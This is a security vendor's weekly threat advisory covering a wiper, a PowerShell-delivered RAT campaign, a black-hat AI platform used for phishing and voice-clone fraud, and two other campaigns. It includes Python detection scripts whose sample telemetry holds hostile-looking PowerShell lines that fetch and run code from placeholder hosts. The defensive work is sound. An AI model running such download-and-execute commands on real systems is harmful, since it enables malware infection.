Xanthorox AI – Rise of Autonomous Malicious AI
- SISA Weekly Threat Watch -

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include:
- PathWiper: An Advanced Destructive Malware Shows Tactical Evolution
- Multi-Stage PowerShell Attack Distributing NetSupport RAT via Fake Docusign and Gitcode Sites
- Xanthorox AI – An Autonomous Malicious AI
- Rare Werewolf Leveraging PowerShell and Legitimate Apps in Russian Cyber Campaigns
- FIN6 Leveraging Fake Resumes and AWS Infrastructure to Deploy More_eggs Malware
These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.
SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action against the latest critical threats.
1. PathWiper: Advanced Destructive Malware Shows Tactical Evolution
A destructive cyberattack targeting critical infrastructure in Ukraine was uncovered by cybersecurity researchers, revealing the use of a new wiper malware dubbed PathWiper. The attackers exploited a legitimate endpoint administration tool, indicating privileged access and deep familiarity with the victim’s environment. Believed to be linked to a Russia-aligned APT, PathWiper uses advanced techniques to identify and wipe physical, logical, and network drives. It corrupts NTFS structures and the Master Boot Record (MBR), dismounting volumes using system-level commands before initiating data destruction.
Recommendations include securing endpoint administration consoles with strong authentication and monitoring for unusual script executions. Organizations should also set behavioral alerts for suspicious VBScript activity, mass file overwrites, or dismount volume commands. Maintaining isolated, verified backups is essential, along with limiting network share exposure and monitoring relevant registry paths like HKEY_USERS\Network. Threat hunting teams are advised to look for filenames such as sha256sum.exe or uacinstall.vbs to detect potential compromise early.
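The hunting guidance above can be turned into a small triage rule set. The following is an added example, not code from the advisory or from any vendor: it applies the advisory's own indicators (the filenames sha256sum.exe and uacinstall.vbs, suspicious VBScript host activity, and mass file overwrites) to constructed endpoint telemetry. The event record layout, the script-host names, and the overwrite threshold and time window are assumptions chosen for the example.

```python
"""Hunt for PathWiper-style wiper behaviour in endpoint telemetry.

Added example, not from the SISA advisory. It applies the advisory's own
recommendations (flag the filenames sha256sum.exe / uacinstall.vbs, suspicious
VBScript host activity, and mass file overwrites) to constructed event records.
The event format, script-host names and thresholds are assumptions.
"""
from collections import defaultdict

# Filenames the advisory names as indicators of PathWiper activity.
IOC_FILENAMES = {"sha256sum.exe", "uacinstall.vbs"}
# Windows script hosts that execute VBScript (assumption: telemetry records the image path).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# One process writing this many distinct files inside the window counts as a
# mass overwrite (threshold and window chosen for the example).
OVERWRITE_THRESHOLD = 5
WINDOW_SECONDS = 60


def hunt(events):
    """Return (rule, detail) findings for a list of event records.

    Each event is a dict with keys: ts (int seconds), host, pid, image,
    type ('process' or 'filewrite') and target (command line or written path).
    """
    findings = []
    writes = defaultdict(list)  # (host, pid, image) -> [(ts, path)]
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "process":
            # Rule 1: advisory IoC filenames in the image path or command line.
            haystack = f"{image} {ev['target']}".lower()
            for ioc in IOC_FILENAMES:
                if ioc in haystack:
                    findings.append(("ioc_filename", f"{ev['host']} pid {ev['pid']}: {ioc}"))
            # Rule 2: a VBScript host was launched; surface it for analyst review.
            if image.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
                findings.append(("vbscript_host", f"{ev['host']} pid {ev['pid']}: {ev['target']}"))
        elif ev["type"] == "filewrite":
            writes[(ev["host"], ev["pid"], image)].append((ev["ts"], ev["target"]))
    # Rule 3: mass overwrite, i.e. many distinct paths written by one process in the window.
    for (host, pid, image), entries in writes.items():
        entries.sort()
        for i, (start, _) in enumerate(entries):
            in_window = {path for ts, path in entries[i:] if ts - start <= WINDOW_SECONDS}
            if len(in_window) >= OVERWRITE_THRESHOLD:
                findings.append(("mass_overwrite",
                                 f"{host} pid {pid} ({image}): {len(in_window)} files in {WINDOW_SECONDS}s"))
                break
    return findings


# Constructed sample telemetry: one host showing the wiper pattern, one benign write.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "srv01", "pid": 4012, "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "target": r"wscript.exe C:\ProgramData\uacinstall.vbs"},
    {"ts": 101, "host": "srv01", "pid": 4100, "type": "process",
     "image": r"C:\ProgramData\sha256sum.exe", "target": "sha256sum.exe"},
] + [
    {"ts": 102 + i, "host": "srv01", "pid": 4100, "type": "filewrite",
     "image": r"C:\ProgramData\sha256sum.exe", "target": rf"D:\data\file{i}.dat"}
    for i in range(6)
] + [
    {"ts": 200, "host": "ws02", "pid": 900, "type": "filewrite",
     "image": r"C:\Program Files\Editor\editor.exe", "target": r"C:\Users\a\notes.txt"},
]


def run_sample():
    """Run the rules over the constructed sample and return the findings."""
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_sample():
        print(f"[{rule}] {detail}")
```

The overwrite rule keys on distinct paths per process rather than raw write count, so a legitimate application rewriting one file repeatedly does not trip it; tune the threshold and window to the baseline of the environment before alerting.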
2. PowerShell Attack Distributes NetSupport RAT via Fake Docusign and Gitcode Sites
A new multi-stage malware campaign is exploiting spoofed websites that imitate services like Gitcode and Docusign to trick users into executing malicious PowerShell scripts. The attack begins with clipboard poisoning and CAPTCHA-based social engineering, prompting users to paste harmful code via the Windows Run dialog. This initiates a chain of PowerShell scripts that eventually installs NetSupport RAT, a legitimate tool often abused by threat actors. Persistence is established using binaries downloaded from GitHub.
Researchers note similarities with previous SocGholish (FakeUpdates) activity, and the use of legitimate infrastructure makes detection challenging. Obfuscation, script layering, and dynamic hosting help evade traditional defenses.
Recommendations include user training on the dangers of executing unknown scripts, blocking access to suspicious domains, enabling detailed PowerShell logging, disabling clipboard execution on sensitive endpoints, enforcing signed script policies, and hunting for anomalies such as jp2launcher.exe or connections to wbdims.exe on GitHub. Monitoring network traffic and clipboard behavior can help detect and stop similar attacks early.
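The hunting items above (jp2launcher.exe, wbdims.exe fetched from GitHub) combine naturally with generic heuristics for a command pasted into the Run dialog. The following is an added example, not code from the advisory or from any vendor product: it triages constructed process-creation records for the advisory's indicators and for powershell.exe spawned by explorer.exe with a URL on its command line, a hidden window, an encoded command, or PowerShell launching PowerShell (the script layering the advisory mentions). The record layout, the sample command lines, and the placeholder URLs are constructed for the example.

```python
"""Triage process-creation telemetry for the fake-Docusign/Gitcode PowerShell chain.

Added example, not part of the SISA advisory or any vendor tool. Encodes the
advisory's hunting guidance (jp2launcher.exe, wbdims.exe hosted on GitHub) plus
generic heuristics for a command pasted into the Run dialog. Record layout,
sample command lines and URLs are constructed.
"""
import re

CAMPAIGN_INDICATORS = ("jp2launcher.exe", "wbdims.exe")  # named in the advisory
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # the Run dialog spawns its command from explorer.exe
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# -e / -ec / -enc / -encodedcommand followed by whitespace
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (rule, detail) findings for process-creation records.

    Each record: {"host", "parent_image", "image", "command_line"}.
    """
    findings = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        cmd = ev["command_line"]
        where = f"{ev['host']}: {parent} -> {image}"
        urls = URL_RE.findall(cmd)
        # Advisory IoCs: filenames in the image or command line, and GitHub-hosted binaries.
        for ind in CAMPAIGN_INDICATORS:
            if ind in image or ind in cmd.lower():
                findings.append(("campaign_indicator", f"{where} ({ind})"))
        for url in urls:
            if "github" in url.lower() and any(i in url.lower() for i in CAMPAIGN_INDICATORS):
                findings.append(("github_hosted_payload", f"{where} {url}"))
        if image not in POWERSHELL_IMAGES:
            continue
        # Generic heuristics for the pasted-command (Run dialog) pattern.
        if parent in INTERACTIVE_PARENTS and urls:
            findings.append(("pasted_download", f"{where} {urls[0]}"))
        if HIDDEN_RE.search(cmd):
            findings.append(("hidden_window", where))
        if ENCODED_RE.search(cmd):
            findings.append(("encoded_command", where))
        if parent in POWERSHELL_IMAGES:
            findings.append(("script_layering", where))
    return findings


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample chain on ws01 plus one benign scheduled script on srv02.
SAMPLE_EVENTS = [
    # Stage 1: user pastes the "verification" command into the Run dialog.
    {"host": "ws01", "parent_image": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "command_line": 'powershell.exe -w hidden -c "Invoke-WebRequest https://captcha-verify.invalid/run"'},
    # Stage 2: the fetched script launches an encoded second stage (base64 of "PLACEHOLDER").
    {"host": "ws01", "parent_image": PS_IMAGE, "image": PS_IMAGE,
     "command_line": "powershell.exe -nop -enc UExBQ0VIT0xERVI="},
    # Stage 3: persistence binary fetched from GitHub (account and repo are placeholders).
    {"host": "ws01", "parent_image": PS_IMAGE, "image": PS_IMAGE,
     "command_line": 'powershell.exe -c "Invoke-WebRequest '
                     'https://raw.githubusercontent.com/PLACEHOLDER-ACCOUNT/repo/main/wbdims.exe '
                     '-OutFile C:\\Users\\Public\\wbdims.exe"'},
    # Stage 4: the Java launcher associated with the RAT is observed.
    {"host": "ws01", "parent_image": PS_IMAGE, "image": r"C:\Users\Public\jp2launcher.exe",
     "command_line": "jp2launcher.exe"},
    # Benign: an inventory script run by a service, no URL, not hidden, not encoded.
    {"host": "srv02", "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS_IMAGE,
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]


def run_sample():
    """Run the triage rules over the constructed sample and return the findings."""
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_sample():
        print(f"[{rule}] {detail}")
```

With script block logging enabled as the advisory recommends, the same rules can be run over the decoded script text in addition to the command line, which catches the stages that never put a URL on the process command line.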
3. Xanthorox AI – Rise of Autonomous Malicious AI
Xanthorox AI is a next-gen black-hat AI platform built specifically for cybercrime. Unlike jailbroken chatbots like WormGPT, it’s a fully offline, modular system capable of phishing, malware creation, reconnaissance, social engineering, and deepfake-enabled attacks. It operates on dark web infrastructure without relying on public APIs, making it exceptionally hard to detect. Its architecture includes five components: a malware generator (Xanthorox Coder), image/data extractor (Vision), phishing content creator (Reasoner Advanced), voice and file handler, and a custom OSINT engine scraping over 50 sources.
Real-world use includes phishing attacks on a U.S. bank and executive voice cloning for fraud.
Recommended defenses include behavior-based threat detection, memory-resident malware sensors, voice liveness checks, and sandboxing for malware analysis. Organizations should train staff using AI-generated phishing simulations and enforce Zero Trust execution policies. Security leaders are urged to prioritize adaptive AI-resistant controls, enhance SOAR playbooks, and align closely with MXDR partners to detect and contain such sophisticated threats.
4. Rare Werewolf Leveraging PowerShell and Legitimate Apps in Cyber Campaigns
The threat actor Rare Werewolf (formerly Rare Wolf) has re-emerged, targeting Russia and CIS regions with stealthy attacks focused on remote access, credential theft, and cryptocurrency mining using tools like XMRig. Their campaigns rely on legitimate third-party software such as AnyDesk, Blat, and WebBrowserPassView to evade detection. Intrusions begin with phishing emails containing password-protected payloads and use scheduled PowerShell tasks to automate access and exfiltration during off-hours.
A parallel group, DarkGaboon, is also active, deploying LockBit 3.0 ransomware via phishing lures containing RTF documents and .scr executables. Their focus appears to be encryption without data exfiltration, relying on leak site extortion tactics.
Recommendations include blocking password-protected attachments, disabling script execution where not needed, detecting suspicious tool usage, monitoring for unusual PowerShell activity, and deploying behavior-based endpoint controls. For ransomware defense, regular offline backups, segmentation, CDR for attachments, and active threat hunting for LockBit, XWorm, and Revenge RAT are strongly advised.
5. FIN6 Leverages Fake Resumes and AWS Infrastructure to Deploy More_eggs Malware
The FIN6 threat group is distributing More_eggs, a JavaScript-based backdoor, by impersonating job seekers on platforms like LinkedIn and Indeed. Victims receive links to fake resumes hosted on AWS infrastructure, leading to ZIP files containing the malware. More_eggs enables credential theft, remote access, and follow-on attacks, including ransomware delivery.
The campaign uses advanced evasion techniques such as CAPTCHA gates and conditional payload delivery—targeting only Windows users on residential IPs, while serving benign content to VPNs or scanners. Domains are registered through GoDaddy with privacy protection, making attribution difficult.
Recommendations include training HR teams to avoid unsolicited resume downloads from unknown domains, sandboxing resume file reviews, monitoring cloud service traffic, and using behavioral detection tools for JavaScript threats. Organizations should block known campaign domains and report any suspicious AWS-hosted content to AWS Trust & Safety. This campaign highlights the need for vigilance even in everyday operations like recruitment.
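Two recommendations above share one control point: blocking password-protected attachments and .scr lures (Rare Werewolf and DarkGaboon, item 4) and catching ZIP archives that carry a JavaScript backdoor such as More_eggs (item 5) are both decisions a mail or file gateway makes when it opens an archive. The following is an added example, not code from the advisory or from any gateway product: an attachment gate that flags encrypted ZIP entries, blocked file types, and executables hiding under a harmless name. The samples are constructed in memory; the "password-protected" one is simulated by setting the encryption flag bit, since the standard library cannot write encrypted archives.

```python
"""Gate ZIP attachments: encrypted entries, blocked types, disguised executables.

Added example, not from the SISA advisory or any product. Blocked extensions are
taken from the advisory (.scr lures, .js backdoor); the verdict names and the
constructed samples are assumptions for this example.
"""
import io
import posixpath
import zipfile

BLOCKED_EXTENSIONS = {".scr", ".js"}  # .scr (item 4 lures), .js (More_eggs, item 5)
PE_MAGIC = b"MZ"  # a Windows executable starts with these two bytes


def inspect_zip_attachment(data):
    """Return (verdict, reasons) for raw ZIP bytes; verdict is 'block' or 'allow'."""
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return "block", ["not a valid ZIP archive"]
    for info in zf.infolist():
        if info.is_dir():
            continue
        encrypted = bool(info.flag_bits & 0x1)  # general purpose bit 0 = encrypted
        if encrypted:
            reasons.append(f"password-protected entry: {info.filename}")
        # The final extension decides, so resume.pdf.js is treated as .js.
        ext = posixpath.splitext(info.filename.lower())[1]
        if ext in BLOCKED_EXTENSIONS:
            reasons.append(f"blocked file type {ext}: {info.filename}")
        # Content check only for entries we can actually read.
        if not encrypted and ext not in (".exe", ".dll", ".scr"):
            with zf.open(info) as fh:
                if fh.read(2) == PE_MAGIC:
                    reasons.append(f"executable content under non-executable name: {info.filename}")
    return ("block" if reasons else "allow"), reasons


def build_zip(entries):
    """Constructed sample archive from {name: bytes}; stored, so no 'PK' bytes appear in data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def mark_encrypted(data):
    """Simulate a password-protected archive by setting the encryption flag bit
    in every local file header (offset 6) and central directory entry (offset 8)."""
    buf = bytearray(data)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        i = buf.find(sig)
        while i != -1:
            buf[i + off] |= 0x01
            i = buf.find(sig, i + 4)
    return bytes(buf)


# Constructed samples for the cases the advisory describes.
SAMPLES = {
    "fake_resume": build_zip({"John_Doe_Resume.pdf.js": b"// constructed script body\n"}),
    "protected_lure": mark_encrypted(build_zip({"scan_2025.scr": b"constructed bytes"})),
    "disguised_exe": build_zip({"invoice.pdf": PE_MAGIC + b"\x90\x00constructed"}),
    "benign_report": build_zip({"report.pdf": b"%PDF-1.4 constructed"}),
}


def run_samples():
    """Return {sample name: verdict} for the constructed archives."""
    return {name: inspect_zip_attachment(data)[0] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        verdict, reasons = inspect_zip_attachment(data)
        print(f"{name}: {verdict} {reasons}")
```

Encrypted entries are never opened, so the gate cannot be tripped into an exception by a password it does not have; the reason list is returned alongside the verdict so the sandbox review step the advisory recommends starts with the context already attached.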
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.